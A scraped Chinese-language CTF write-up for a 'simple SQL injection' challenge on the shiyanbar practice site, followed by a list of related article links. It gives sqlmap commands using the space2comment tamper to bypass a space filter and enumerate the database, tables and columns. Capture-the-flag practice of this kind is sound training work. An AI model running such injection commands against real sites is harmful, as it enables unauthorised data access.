实验吧-简单的注sql入 writeup
来源:互联网 发布:js移除元素 编辑:程序博客网 时间:2024/06/05 04:42
解题链接: http://ctf5.shiyanbar.com/web/index_2.php
1.输入id值,通过回显发现题目应该是进行了空格过滤
2.使用sqlmap进行注入
2.1 python sqlmap.py -u “http://ctf5.shiyanbar.com/web/index_2.php?id=1” –random-agent –tamper=space2comment.py
–current-db 查看当前数据库名称,返回web1
2.2 python sqlmap.py -u “http://ctf5.shiyanbar.com/web/index_2.php?id=1” –random-agent –tamper=space2comment.py
–current-db –tables 查看当前数据库名称和数据库里所有的表
看到web1里有个flag表,看来key就在里面
2.3 python sqlmap.py -u “http://ctf5.shiyanbar.com/web/index_2.php?id=1” –random-agent –tamper=space2comment.py
–current-db –tables –columns 看到flag表里面有个flag列
- 实验吧-简单的注sql入 writeup
- 实验吧 ctf 题目简单的sql注入2writeup
- 实验吧-因缺思汀的绕过WriteUp
- 实验吧-因缺思厅的绕过writeup
- writeup-FLAG 实验吧
- ctf实验吧writeup
- 实验吧Writeup
- 实验吧-false writeup
- 实验吧 Web 这个看起来有点简单! Writeup
- 实验吧-程序逻辑问题writeup
- 实验吧web题库writeup
- 实验吧-NSCTF web200 writeup
- 实验吧-你真的会PHP吗?writeup
- 实验吧_简单的sql注入
- 实验吧 简单的sql注入
- 实验吧简单的SQL注入
- CheatEngine-实验吧CTF题库writeup
- 实验吧密码学WriteUp(一)
- 数据结构---哈夫曼编码
- 我现在是菜鸟——Item
- Centos安装编译环境
- 数据库事务
- angular js实现公共体
- 实验吧-简单的注sql入 writeup
- ANGUALR JS学习环境搭建
- Protobuf3 + Netty4: 在socket上传输多种类型的protobuf数据
- fileZilla连接oracle服务器,传DMP文件
- animation(二):旋转的星球
- LInux高级网络配置
- 在entity framework 中使用 LINQ 对表进行左关联查询且group by 分组查询的示例,并且按小时分组查询时间段
- 文章标题
- PLSQL编程5:plsql异常处理
